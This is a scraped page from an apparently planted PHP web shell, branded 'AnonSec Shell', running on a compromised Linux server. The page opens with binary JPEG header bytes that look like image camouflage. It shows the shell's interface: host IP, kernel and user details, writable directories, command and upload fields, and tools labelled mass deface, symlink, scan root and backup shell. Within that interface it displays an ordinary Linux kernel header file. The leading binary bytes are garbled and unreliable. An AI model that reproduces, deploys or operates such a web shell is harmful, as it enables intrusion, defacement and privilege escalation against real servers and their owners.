JFIF  H H C nxxd C "     &    !1A2Q"aqBb    1   ? R{~ ,.Y| @sl_޸s[+6ϵG};?2Y`&9LP ?3rj  "@V]:3T -G*P ( *(@AEY]qqqALn +Wtu?)l QU T* Aj- x:˸T u53Vh @PS@ ,i,!"\hPw+E@ ηnu ڶh% (Lvũbb- ?M֍݌٥IHln㏷L(6 9L^"6P  d&1H&8@TUT CJ%eʹFTj4i5=0g J &Wc+3kU@PS@HH33M * "Uc(\`F+b{RxWGk ^#Uj*v' V ,FYKɠMckZٸ]ePP  d\A2glo=WL(6 ^;k"ucoH"b ,PDVlvL_/:̗rN\m dcw T-O$w+FZ5T *Y~l: 99U)8ZAt@GLX*@bijqW;MᎹ،O[5*5*@=qusݝ *EPx՝.~ YИ 3M3@E)GTg%Anp P MUҀhԳW c֦iZ ffR 7qMcyAZT c0bZU k+oG<] APQ T A={PDti@c>>KÚ"q L.1P k6QY7t.k7o  <P &yַܼJZy Wz{UrS @ ~P)Y:A"]Y&ScVO%17 6l4 i4YR5 ruk* ؼdZͨZZ cLakb3N6æ\1`XTloTuT AA 7Uq@2ŬzoʼnБRͪ&8}: e}0ZNΖJ*Ս9˪ޘtao]7$ 9EjS} qt" ( .=Y:V#'H: δ4#6yjѥBB ;WD-ElFf67*\AmAD Q __'2$ TX 9nu'm@iPDT qS`%u%3[nY,  :g = tiX H]ij"+6Z* .~|05s6 ,ǡ ogm+ KtE-BF  ES@(UJ xM~8%g/= Vw[Vh 3lJT  rK -kˎY ٰ  ,ukͱٵf sXDP  ]p]&MS95O+j &f6m463@ t8ЕX=6}HR 5ٶ06 /@嚵*6  " hP@eVDiYQT `7tLf4c?m//B4 laj  L} :E  b#PHQb, yN`rkAb^ |} s4XB4 * ,@[{Ru+%le2} `,kI$U` >OMuh  P % ʵ/ L\5aɕVN1R6 3}ZLj-Dl@ *( K\^i@F@551 k㫖h  Q沬#h XV +;]6z OsFpiX $OQ ) ųl4 YtK'(W AnonSec Shell
AnonSec Shell
Server IP : 20.75.53.88  /  Your IP : 216.73.217.165   [ Reverse IP ]
Web Server : Apache
System : Linux VMRALP-3 4.4.0-256-generic #290~14.04.1-Ubuntu SMP Thu Jun 20 09:24:50 UTC 2024 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29+esm15
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
Domains : 3 Domains
MySQL : ON  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /lib/modules/4.4.0-256-generic/build/include/linux/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /lib/modules/4.4.0-256-generic/build/include/linux/dynamic_queue_limits.h
/*
 * Dynamic queue limits (dql) - Definitions
 *
 * Copyright (c) 2011, Tom Herbert <therbert@google.com>
 *
 * This header file contains the definitions for dynamic queue limits (dql).
 * dql would be used in conjunction with a producer/consumer type queue
 * (possibly a HW queue).  Such a queue would have these general properties:
 *
 *   1) Objects are queued up to some limit specified as number of objects.
 *   2) Periodically a completion process executes which retires consumed
 *      objects.
 *   3) Starvation occurs when limit has been reached, all queued data has
 *      actually been consumed, but completion processing has not yet run
 *      so queuing new data is blocked.
 *   4) Minimizing the amount of queued data is desirable.
 *
 * The goal of dql is to calculate the limit as the minimum number of objects
 * needed to prevent starvation.
 *
 * The primary functions of dql are:
 *    dql_queued - called when objects are enqueued to record number of objects
 *    dql_avail - returns how many objects are available to be queued based
 *      on the object limit and how many objects are already enqueued
 *    dql_completed - called at completion time to indicate how many objects
 *      were retired from the queue
 *
 * The dql implementation does not implement any locking for the dql data
 * structures, the higher layer should provide this.  dql_queued should
 * be serialized to prevent concurrent execution of the function; this
 * is also true for  dql_completed.  However, dql_queued and dlq_completed  can
 * be executed concurrently (i.e. they can be protected by different locks).
 */

#ifndef _LINUX_DQL_H
#define _LINUX_DQL_H

#ifdef __KERNEL__

struct dql {
	/* Fields accessed in enqueue path (dql_queued) */
	unsigned int	num_queued;		/* Total ever queued */
	unsigned int	adj_limit;		/* limit + num_completed */
	unsigned int	last_obj_cnt;		/* Count at last queuing */

	/* Fields accessed only by completion path (dql_completed) */

	unsigned int	limit ____cacheline_aligned_in_smp; /* Current limit */
	unsigned int	num_completed;		/* Total ever completed */

	unsigned int	prev_ovlimit;		/* Previous over limit */
	unsigned int	prev_num_queued;	/* Previous queue total */
	unsigned int	prev_last_obj_cnt;	/* Previous queuing cnt */

	unsigned int	lowest_slack;		/* Lowest slack found */
	unsigned long	slack_start_time;	/* Time slacks seen */

	/* Configuration */
	unsigned int	max_limit;		/* Max limit */
	unsigned int	min_limit;		/* Minimum limit */
	unsigned int	slack_hold_time;	/* Time to measure slack */
};

/* Set some static maximums */
#define DQL_MAX_OBJECT (UINT_MAX / 16)
#define DQL_MAX_LIMIT ((UINT_MAX / 2) - DQL_MAX_OBJECT)

/*
 * Record number of objects queued. Assumes that caller has already checked
 * availability in the queue with dql_avail.
 */
static inline void dql_queued(struct dql *dql, unsigned int count)
{
	BUG_ON(count > DQL_MAX_OBJECT);

	dql->last_obj_cnt = count;

	/* We want to force a write first, so that cpu do not attempt
	 * to get cache line containing last_obj_cnt, num_queued, adj_limit
	 * in Shared state, but directly does a Request For Ownership
	 * It is only a hint, we use barrier() only.
	 */
	barrier();

	dql->num_queued += count;
}

/* Returns how many objects can be queued, < 0 indicates over limit. */
static inline int dql_avail(const struct dql *dql)
{
	return ACCESS_ONCE(dql->adj_limit) - ACCESS_ONCE(dql->num_queued);
}

/* Record number of completed objects and recalculate the limit. */
void dql_completed(struct dql *dql, unsigned int count);

/* Reset dql state */
void dql_reset(struct dql *dql);

/* Initialize dql state */
int dql_init(struct dql *dql, unsigned hold_time);

#endif /* _KERNEL_ */

#endif /* _LINUX_DQL_H */

Anon7 - 2022
AnonSec Team